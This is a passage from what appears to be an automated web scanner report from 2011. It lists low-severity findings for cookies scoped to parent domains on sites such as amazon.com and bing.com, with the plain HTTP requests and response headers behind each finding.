Set-Cookie: wpn_persistent=max_utype%3Ddefault%26PID%3DTUSnsawQAEcAADI6GyA%26times_seen_invite%3D%26filled_demo_survey%3D%26wp_stage%3Dproduction%26persistent_search_count%3D%26had_successful_search%3D; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.whitepages.com
Set-Cookie: wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; path=/; domain=.whitepages.com
Content-Length: 34492


            <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...

16.3. http://silverlight.codeplex.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://silverlight.codeplex.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: silverlight.codeplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=sav3egusogls5mked5qq0jiw; domain=.codeplex.com; path=/; HttpOnly
X-AspNetMvc-Version: 3.0
P3P: CP="NON DSP COR ADM CUR DEV TAI OUR IND NAV PRE STA"
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:30 GMT
Content-Length: 47853


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" class="IE IE7 ">

<head id
...[SNIP]...

16.4. http://t.mookie1.com/t/v1/imp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;40142779&migRandom=5845715&migTrackFmtExt=client;io;ad;crtv HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:27:29 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: session=1296350849|1296350849; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

16.5. http://www.amazon.com/gp/product/0470650923

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/0470650923

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/product/0470650923?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0470650923 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:52 GMT
Server: Server
x-amz-id-1: 10BYGVG84SJDT6NK5QPW
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: Q88q6IxskVrNIWayV7qw53kBxjzbTCVGq9rikqIi4h0WIkQdBAnBtxKB8IUJkYyC
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=192-2919974-2112928; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=yQ9pIXqVNQ+kictSRtVelTJ1cwo6IQrEPJd+SWonrlO++kyS3eLyIk/nXbtbxx8D0mbpsSGjtlUuYe0vRowEBFX4sJLod/zu37k/IErBpleFnaz490Xa9SJrjYxKo9y6hu8Qw1NAIvP4UUaxU2L8jbY4r+JHs4ZKm4hST9QEmWm4QdymYv1J0wtClao472qWA+wllUTs9XnshUSKK5Zm7V07ZqJFh4wIijJE8gGWy6ub2Eb0pbSAyRM/8LmJTh6hNxn3d/uTTI7mbtQzIJuC04Uu58ASnyvxk5fZ6wzy7FLYCySmGxvLO1zbG7cicDX3t7BaUJKRVQDLOs9+B6raaQASSQzPOHnazizlJ7UsFvCoBiazT7uOFWxYUsf/18czWXcuM7antU7XxMLLqoSkfFWlqwjyu3ae8xXJ53xwMF3gWWGRilFqmd2KJU/GPs60FA1sCx6Rd0c=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:52 2011 GMT
Content-Length: 413393


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...

16.6. http://www.amazon.com/gp/product/0672333368

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/0672333368

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/product/0672333368?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0672333368 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:33 GMT
Server: Server
x-amz-id-1: 04VBMFPBJXZ8J962J8W2
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: fH3WLv3Jzmox2K4JTSORqyP3dG78f8/Z57/rsvJ+e57X3LhuWxe1LUoVMzwVuNdD
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=185-0119564-6236271; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=Oel7bYwRWS1gKV5RSiNZiK5lZAAokMgjRBrE5HDUyc9ir04+EELG8B5ZvPf93p6q/Wug8LCjECLDGs1NV2Ss5CncqyEhzH4Xx7dc9WlLyukc31H5gDwd1M0N2+5dFhG9r9UQX7bBDo1UvRUWe9CKYp29GbQIzzh4/e34AfsAPvBx1HVvihnL6R0of1OO3HpDP4AGMQXekYYMU4xOPcaCZk0VUxYwQP/RumeAVnei2D4rad8Xugnf2lk0nqBj3rkP6vzCnoFEzmbe3GgDLzEstwODPn9gW6oauV3yNspeqzecQNyMXmsDy/UrRjAUYndEw91zCgoaiXhnp39HquunCVQJJv/M/EGP7xhqBuRl49vBAGLgp8yRAJwJEgmd86mQGKHoS1Ku4VfxXIMdaRhhkLOtFXZRjef7VWDgVqemNz4+2YF2kiCxAGs6W/ltnCEp33kcaW9Sa6E=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:33 2011 GMT
Content-Length: 386121


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...

16.7. http://www.amazon.com/gp/product/0981511821

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/0981511821

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/product/0981511821?ie=UTF8&tag=silverlightnet-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0981511821 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:30:48 GMT
Server: Server
x-amz-id-1: 04T12HTYNC9C14B5HM4X
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: XeMb8ZphbyEceEV8uZ/rPWye3cxGU6y1x/oV8aO+RYhm6u/E/f5MILGVJEj9+KgY
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=192-4783126-1171450; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=w5NxRqtIaF3L4rahG0xqjBB3n3qFCUwofDp3zBWe5EhsjtbYur03xSjQJ9BybU0a50jcTNieFmXXtReKWFRC9VmjzXi0XOC/OFAKRnG7FxTSci1yzlHjHk93BdOFZd0lP2syU01bP9TPGDHRfsl3MIWGi6LFCm6KknGsRmeHY8fn9B/9V80kP771c+DIVHNbXgbdUStVjMbObwSMw0PsU1t5OEXrbvibQByiwa/enRat+18rO1z/R5x72/itj1Hgk/9qruaLuAMz0XARYys99VN3UXRqpAZ5ZdeRF0tpgFHr5oNT5iwGE41ntxzwpuWVgDuzqVnkzcVQMTPlrDEuvjne19cXXCziPz1UvkP6Lli9UrikpcpmBibUKKWw06dJpIda0iRpYtxcMRQ2Kw/KAsxg3VFJrlcfJyClK5xaGGuIOxZCz57xNTqoWJehRZwKjuk3GB7s/Rg=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:49 2011 GMT
Content-Length: 312688


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...

16.8. http://www.amazon.com/gp/product/184968006X

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/184968006X

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/product/184968006X?ie=UTF8&tag=silverlightnet-20&linkCode=xm2&camp=1789&creativeASIN=184968006X HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:30:20 GMT
Server: Server
x-amz-id-1: 0XKECKNR6H60A6C1P2PC
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: CcVgt8Ki3aGDcInLSZrXm3lZNlBFSwvoguF5oYlAkL7M50lOj+5ROXGiGrpYAFMx
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=180-2237308-2659866; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=eHjsire/T0R7tdwagP8TcPZKxHTTNNEzlEP0ADU6p9fDKp0HUddz5FB1vK4SWFnhMc+scZ3m3MMvdOoMBY3JMfDMgo9VyMfPoh4njOXzH+BQw3FF7fbIOVZ2IDZk0zQNft3m03t/gL+Tvy3Fp+s+IAXdK6TUGa3MgVEkoCKmlXgie4ZhutN7WZcgnsC2goxBTpcCUomgvJOn1FOsZJdpvaOeWwE7d4VopLfVs94lsjI1refuYz4Fh3eO4sF0scjQpxW30YkQtgxE21eMEFTpM3qzTPbz2A4In7Bgd+9yov6kS3a2jmHTnaE+PhrTEqnDDXpdHgngmPdiaQgXuM6nGSPUPALmbdC5KPrDo93c5AVJkz34KeYRlhnIYDw9LgulDl/Iq7uP7A0bF2cLU4kNTRvZoGaE4G4BI5Ct3/CXQEOqN+ABdMJN/2U0eTeT5lbUCjHlpbF1b4Y=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:20 2011 GMT
Content-Length: 400270


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...

16.9. http://www.amazon.com/gp/product/1935182374

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/product/1935182374

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/product/1935182374?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=1935182374 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:13 GMT
Server: Server
x-amz-id-1: 0HRJE1J9WQNXJFNGE4NT
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: NW5s8gvokJzw5y8JSRfujzyLlaoU46emA4SVA7QeDoqwIRKJVd6WwTevRv3TMvWf
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=187-0383633-5130955; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=ZM4E0es5+/XEPKcb4MMxmuznZiNyR6gzmDyuvhd39TYBscZma+7OBrLUTIyOOP5L3sOxz0fHi+PVrR7mWXqIyqofYHjJvSwGljfj0cWis60uRBkc1sDMnpiFAFA2IIWQcy0VuQkFO/hek0tlyUsNbuYdCElWcPRfXi2EhNSRROn/5eBkOahc4qN0YXGEPSxJXkpZsFFUUSU+6NyU2vkiTcA6YKmyCajS7mMAIbCCQEcVDyHYe/GzA3wLflh2+74ShUEGuIQUYMUcM2sdqOFPBWrtSn3q/r5KXVvVo3NHlIV0vVwFkMcJVoUPOq2S74LF/6hYIm/NwCdL9vCXUOjzqk7tUlQ3znq9WVE1fo0DdyrZ3XKTD152l098UAWXhdfxPyegtMSG3+GMu2CSzmKtj4j6dgItiNp5cZZ5baIxudoffyAijgZcIzX2w8f4DVw+AMxSy/RUheA=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:13 2011 GMT
Content-Length: 398788


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...

16.10. http://www.bing.com/travel/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 80826
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:07:24 GMT
Connection: close
Set-Cookie: lbc=904; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-23es9dprqmhf2yz5b70uaphsurhm_VID-8s1eg7na0h4jyz617ujc5pm7spr_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:07:24 GMT; Path=/travel
Set-Cookie: JSESSIONID=32FADE2FA84EF5FA97AB9602B43221A4; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=1ABB65B487EE44FBB0D3AEF855DF1C31; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:23 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c995d1595d772411ea969529da0bbdb7f; expires=Tue, 29-Jan-2013 17:07:23 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:24 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

16.11. http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/deals/cheap-flights-to-the-caribbean.do

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/deals/cheap-flights-to-the-caribbean.do HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 123865
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:08:45 GMT
Connection: close
Set-Cookie: lbc=3; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-ztqi6svu5vffcyz679phcpo04evn_VID-z4lcugfibg3fcmyz48nd68tfhq64b_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:08:44 GMT; Path=/travel
Set-Cookie: JSESSIONID=91A2C96FEAD616EEDDD9ECC848595A2F; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=1068051DB7E84B2BACE10D21337CBEC9; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:08:44 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8ea85c8550be4c23baed6b6abf5423ed; expires=Tue, 29-Jan-2013 17:08:44 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621028&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:08:44 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

16.12. http://www.bing.com/travel/deals/last-minute-flight-deals.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/deals/last-minute-flight-deals.do

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/deals/last-minute-flight-deals.do HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 116356
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:02 GMT
Connection: close
Set-Cookie: lbc=818; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-zqvs48etgfd15yz5mbf6s748nk29_VID-z6fe286i2v7d0jyz7ntuvlu23m497_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:09:02 GMT; Path=/travel
Set-Cookie: JSESSIONID=A48EA884FEF0FFF60977843516BE3B8B; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=E663063A7EEA44019D8EA6796AF3F79D; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:02 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8620ba7d672b4a22bb6826c6ea8bdf69; expires=Tue, 29-Jan-2013 17:09:02 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:02 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

16.13. http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&qpvt=hawaii+hotels&cid=msn_tab&form=trvcon HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private, max-age=0
Content-Length: 0
Content-Language: en-US
Location: http://www.bing.com/travel/destinations/honolulu-hawaii-trips-1002751
Date: Sat, 29 Jan 2011 23:53:04 GMT
Connection: close
Set-Cookie: lbc=5; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z1frs5ci265ddmyz5ee43ld448c06_VID-n3drr7hochmdyz5qnmnshetag4o_UID-; Domain=.bing.com; Expires=Mon, 28-Jan-2013 23:53:03 GMT; Path=/travel
Set-Cookie: JSESSIONID=0915020A0415116467B0471DBB4BFCCC; Domain=.bing.com; Path=/travel
Set-Cookie: _HOP=I=1&TS=1296345183; domain=.bing.com; path=/
Set-Cookie: _SS=SID=1A1CA9064645474DA9C96504F5DBD78E; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:03 GMT; domain=.bing.com; path=/


16.14. http://www.bing.com/travel/hotels

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/hotels

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/hotels HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 33604
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:53:04 GMT
Connection: close
Set-Cookie: lbc=813; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z6d2ojptrcpcsnyz5s94j9eripmvh_VID-2qgb11njgihtayz4ep5daa0tahh5_UID-; Domain=.bing.com; Expires=Mon, 28-Jan-2013 23:53:04 GMT; Path=/travel
Set-Cookie: JSESSIONID=30926D6422C305F2841AF2C231837CCF; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=52ECE574E10C48CFB614C0DDE7323FE8; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:03 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8f06a5eed62441db9a221eb26be6486f; expires=Mon, 28-Jan-2013 23:53:03 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:04 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

16.15. http://www.dailygrail.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dailygrail.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.dailygrail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
